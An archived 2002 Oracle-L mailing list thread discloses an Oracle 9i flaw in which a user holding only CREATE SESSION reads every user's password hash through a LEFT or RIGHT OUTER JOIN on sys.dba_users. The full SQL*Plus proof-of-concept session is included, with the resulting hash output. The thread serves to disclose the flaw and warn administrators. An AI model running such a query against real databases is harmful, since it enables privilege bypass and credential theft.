Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> RE: Major Security Canyon in 9i!!!!!!

RE: Major Security Canyon in 9i!!!!!!

From: Freeman, Robert <Robert_Freeman_at_csx.com>
Date: Wed, 24 Apr 2002 13:23:38 -0800
Message-ID: <F001.0044E6DB.20020424132338@fatcity.com> 





Ahhh.... I was at IOUG-A and didn't see it....Don't
remember seeing it in the MOUNTAIN (!) of messages
posted here while I was gone...



But anyway, just trying to do my duty as a good
Oracle citizen of the world! :-))



RF



-----Original Message-----


Sent: Wednesday, April 24, 2002 4:17 PM


To: ORACLE-L_at_fatcity.com


Cc: Freeman, Robert 




Robert,



Jonathan Lewis posted this security issue last week. 



Jared








"Freeman, Robert " <Robert_Freeman_at_csx.com>
Sent by: root_at_fatcity.com


04/24/2002 10:23 AM


Please respond to ORACLE-L

 

        To:     Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
        cc: 
        Subject:        Major Security Canyon in 9i!!!!!!






This was posted on Quest/Revealnets DBA Pipeline (by Andrew Simkovsky)... 
Sounds like a major security issue. I have tested this on 9.0.1.2 and it 
is


a real issue:



Someone recently sent me some information regarding a possible security 
flaw



with Oracle's ANSI-compliant outer join syntax in Oracle9i. Apparently, an 



unprivileged user can view any data they want if they use either LEFT 
OUTER 



JOIN or RIGHT OUTER JOIN. Here is an example:



SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2
(c) Copyright 2001 Oracle Corporation. All rights reserved.
Connected to:


Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option


JServer Release 9.0.1.1.1 - Production


SQL> connect / as sysdba


Connected.


SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.


SQL> Grant Create Session to us1;


Grant succeeded.


SQL> connect us1/us11;


Connected.


SQL> select a.username, a.password


2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username


4 ;


USERNAME PASSWORD


------------------------------ ------------------------------


SYS D4C5016086B2DC6A



SYSTEM D4DF7931AB130E37



DBSNMP E066D214D5421CCC



AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD

OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD

AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD

SCOTT F894844C34402B67



US1 491AB9AB94D8A9EF


OUTLN 4A3BA55E08595C81



ORDSYS 7EFA02EC7EA6B86F



OLAPSVR AF52CFD036E8F425



OLAPSYS 3FB8EF9DB538647C



ORDPLUGINS 88A2B2C183431F00



MDSYS 72979A94BAD2AF80



CTXSYS 71E687F036AD56E5



WKSYS 69ED49EE1851900D



OLAPDBA 1AF71599EDACFB00



QS_CBADM 7C632AFB71F8D305



QS_ADM 991CDDAD5C5C32CA



QS 8B09C6075BDF2DC4



QS_WS 24ACF617DD7D8F2F



HR 6399F3B38EDF3288



OE 9C30855E7E0CB02D


PM 72E382A52E89575A


SH 9793B3777CD3BD1A


QS_ES E6A6FA4BB042E3C2


QS_OS FF09F3EB14AE5C26


RMAN E7B5D92911C831E1



QS_CB CF9CFACF5AE24964



QS_CS 91A00922D8C0F146


30 rows selected.


SQL> 






I have tested this on my 9i database and found it to be true only for LEFT 



OUTER JOIN and RIGHT OUTER JOIN. There is no issue with FULL OUTER JOIN, 
or


any of the other ANSI-compliant SQL.



Here is Oracle's response:





Thank you for your concern on this issue. The issue is being activly 
worked


by Oracle at this time. This issue is fixed in 9.0.2 release projected for
this summer. Oracle is diligently working on patchs for each version and
platform. There will be alerts posted on metalink which will tell you when
the patch is available for your specific system. Please update the tar if
you have any additional questions related to this issue. Otherwise let me
know that I can close the tar. Please monitor metalink for new alert
postings specific to this bug or issue.



Thanks,


Oracle Support





-- 



Please see the official ORACLE-L FAQ: http://www.orafaq.com


-- 



Author: Freeman, Robert 


  INET: Robert_Freeman_at_csx.com


Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------


To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).




-- 



Please see the official ORACLE-L FAQ: http://www.orafaq.com


-- 



Author: Freeman, Robert 


  INET: Robert_Freeman_at_csx.com


Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------


To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).
Received on Wed Apr 24 2002 - 16:23:38 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US